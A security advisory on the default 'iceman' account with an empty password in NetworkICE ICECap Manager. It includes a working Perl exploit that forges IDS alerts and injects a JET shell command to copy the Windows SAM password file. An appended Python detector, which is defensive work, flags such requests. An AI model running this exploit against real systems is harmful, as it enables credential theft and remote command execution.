NetworkICE ICECap Manager default username and password vulnerability

Published: 2000-05-17
Updated: 2000-05-17
Severity: High
Threat type: Password recovery
Error type: Design error
Exploit method: Server mode
Affected systems: Microsoft Windows NT 4.0

Detailed description

Application causing the problem: NetworkICE ICECap Manager 2.0.23 and earlier
Remote: Yes
Local: Yes

ICECap Manager is the management console for the BlackICE IDS. By default it listens on port 8081, and alert messages are sent to it over port 8082. However, it ships with a default administrator account, "iceman", whose password is empty. This allows a remote user to log in to ICECap Manager on port 8081 and to send forged alert messages to port 8082.

In addition, ICECap Manager has an option to use Microsoft Access' JET Engine 3.5. Because JET Engine 3.5 has a vulnerability that allows remote execution of VB code, a remote user could combine it with this default username and password to do further damage. For details see the following link:
http://www.securityfocus.com/bid/286

Test code

#!/usr/bin/perl
#
# RFPickaxe.pl - demo exploit for default ICECap login/alerts
# Disclaimer: I do not provide technical support for my exploits!
#
# Sorry, this requires Unix, due to the `date` call

$|=1;
use Socket;

###############################################################
# IP of ICECap system (assumes port 8082)
$Target="10.10.200.4";

# account info - uses default 'iceman' w/ no password
$account="iceman";
$httpauth="aWNlbWFuOiUzQjclQzYlRkU=";

#-------- attributes of the alert ----------
$id="100005";
$issue_name="Exploit";
$sev="1";

# spoof these
$target="0.0.0.8";
$target_dns="some.host.com";
$det_ip="0.0.0.8";
$det_nbn="SENSOR";
$int_ip="255.255.255.255";
$param="Pickaxe";

# either fake the MAC, or use it to run commands via JET vulnerability
#$det_mac="0000000000000";
$det_mac="|shell(\"cmd /c copy c:\\winnt\\repair\\sam._ ".
    "c:\\progra~1\\networ~1\\icecap\\spatch\\en\\sam.exe \")|";

##############################################################

$inet=inet_aton($Target);

# alert timestamp, URL-encoded the way the alerter sends it
$time=`date -u "+%Y-%m-%d %T"`;
$time=~s/ /%20/g;
$time=~s/:/%3a/g;

#path is \program files\network ice\icecap\spatch\en

# form-encoded alert body (the same fields a BlackICE sensor posts)
$alert="accountName=$account&issueID=$id&issueName=$issue_name".
    "&severity=$sev&targetNetAddress=$target&targetDNSName=".
    "$target_dns&detectorNetAddress=$det_ip&detectorNetBIOS".
    "Name=$det_nbn&detectorMacAddress=$det_mac&".
    "intruderNetAddress=$int_ip&detectorType=3&startTime=".
    "$time&parameter=$param\r\n";
$len=length($alert);
@DXX=();

# HTTP headers; the blank line before EOT terminates the header block
$send=<<EOT
POST / HTTP/1.0
User-Agent: netice-alerter/1.0
Host: $Target:8082
Authorization: Basic $httpauth
Content-Type: application/x-www-form-urlencoded
Content-Length: $len

EOT
;
$send=~s/\n/\r\n/g;
$send=$send.$alert;
sendraw("$send");
print @DXX;
exit;

sub sendraw { # raw network functions stay in here
    my ($pstr)=@_;
    $PROTO=getprotobyname('tcp')||0;
    # AF_INET=2 SOCK_STREAM=1
    # without this handler alarm() would simply kill the process on timeout
    local $SIG{ALRM} = sub { die "timeout\n"; };
    eval {
        alarm(30);
        if(!(socket(S,2,1,$PROTO))){ die("socket");}
        # hand-built sockaddr_in: family, port, address, 8 bytes padding
        if(connect(S,pack "SnA4x8",2,8082,$inet)){
            # multi-column perl coding...don't do as I do ;)
            select(S); $|=1; print $pstr;
            @DXX=<S>;
            select(STDOUT); close(S); alarm(0); return;
        } else { die("not responding"); }
        alarm(0);
    };
    if ($@) {
        if ($@ =~ /timeout/){ die("Timed out!\n");}
    }
}

Solution

NetworkICE has released ICECap Manager 2.0.23a to correct this vulnerability. The updated version can be obtained from the following link:
NetworkICE upgrade ic2023a
http://update.networkice.com/cgi/ic2023a.exe?

Related information
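As an added example that is not part of the advisory and not NetworkICE's code, the following Python inspects a captured alert POST of the kind described above (an HTTP/1.0 request to the port-8082 alert listener) and flags the two conditions the advisory describes: a Basic-auth login as the default "iceman" account with an empty password, and a JET expression of the form |shell(...)| smuggled into an alert field such as detectorMacAddress. The field names are those used in the advisory's test code; the two sample requests are constructed, and the "MAC address is hex digits" check is an assumption about the sensor format rather than something the advisory states.

```python
import base64
import re
from urllib.parse import parse_qs

# Default ICECap Manager account named in the advisory.
DEFAULT_ACCOUNTS = {"iceman"}

# Heuristic for a JET/Access expression smuggled into an alert field,
# e.g. |shell("...")|  (the form used in the advisory's test code).
JET_EXPR_RE = re.compile(r"\|[^|]*?\b(shell|cmd)\s*\([^|]*\)\s*\|", re.IGNORECASE)

# Assumption: a genuine detectorMacAddress is hex digits, optionally
# separated by ':' or '-'. Adjust if the real sensor format differs.
MAC_RE = re.compile(r"[0-9A-Fa-f:-]+")


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.0 request into (request line, header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("latin-1")


def decode_basic_auth(header_value: str):
    """Return (user, password) from a 'Basic <base64>' header value, or None."""
    scheme, _, token = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, password = decoded.partition(":")
    return user, password


def inspect_icecap_alert(raw: bytes) -> dict:
    """Flag default-account use and JET expressions in one captured alert POST."""
    request_line, headers, body = parse_http_request(raw)
    findings = []

    creds = decode_basic_auth(headers.get("authorization", ""))
    user = creds[0] if creds else None
    if creds and user in DEFAULT_ACCOUNTS and creds[1] == "":
        findings.append(f"default account '{user}' with empty password")

    # keep_blank_values so an emptied field does not silently disappear;
    # the alerter terminates the body with CRLF, which is not part of the data
    fields = {k: v[0] for k, v in
              parse_qs(body.rstrip("\r\n"), keep_blank_values=True).items()}
    for name, value in fields.items():
        if JET_EXPR_RE.search(value):
            findings.append(f"JET expression in field '{name}'")

    mac = fields.get("detectorMacAddress", "")
    if mac and not MAC_RE.fullmatch(mac):
        findings.append("non-hex detectorMacAddress")

    return {"request_line": request_line, "user": user,
            "fields": fields, "findings": findings}


# Constructed sample 1: forged alert using the default account with no
# password and a JET expression in detectorMacAddress.
SPOOFED_ALERT = (
    b"POST / HTTP/1.0\r\n"
    b"User-Agent: netice-alerter/1.0\r\n"
    b"Host: 192.0.2.10:8082\r\n"
    b"Authorization: Basic " + base64.b64encode(b"iceman:") + b"\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"accountName=iceman&issueID=100005&issueName=Exploit&severity=1"
    b"&targetNetAddress=0.0.0.8&detectorNetAddress=0.0.0.8"
    b'&detectorMacAddress=|shell("cmd /c echo test")|'
    b"&detectorType=3&startTime=2000-05-17%2000%3a00%3a00&parameter=Pickaxe\r\n"
)

# Constructed sample 2: an ordinary alert from a non-default sensor account.
BENIGN_ALERT = (
    b"POST / HTTP/1.0\r\n"
    b"User-Agent: netice-alerter/1.0\r\n"
    b"Host: 192.0.2.10:8082\r\n"
    b"Authorization: Basic " + base64.b64encode(b"sensor01:n0t-default") + b"\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"accountName=sensor01&issueID=2001234&issueName=PortScan&severity=2"
    b"&targetNetAddress=192.0.2.20&detectorNetAddress=192.0.2.30"
    b"&detectorMacAddress=00A0C9123456&detectorType=3"
    b"&startTime=2000-05-17%2000%3a00%3a00&parameter=tcp\r\n"
)

if __name__ == "__main__":
    for label, req in (("spoofed", SPOOFED_ALERT), ("benign", BENIGN_ALERT)):
        result = inspect_icecap_alert(req)
        print(label, result["user"], result["findings"])
```

Feeding reassembled TCP payloads for port 8082 through inspect_icecap_alert() gives a quick way to spot forged alerts while the 2.0.23a upgrade is rolled out; the same authorization check can be run against port 8081 logins to confirm that the default account has been given a password or disabled.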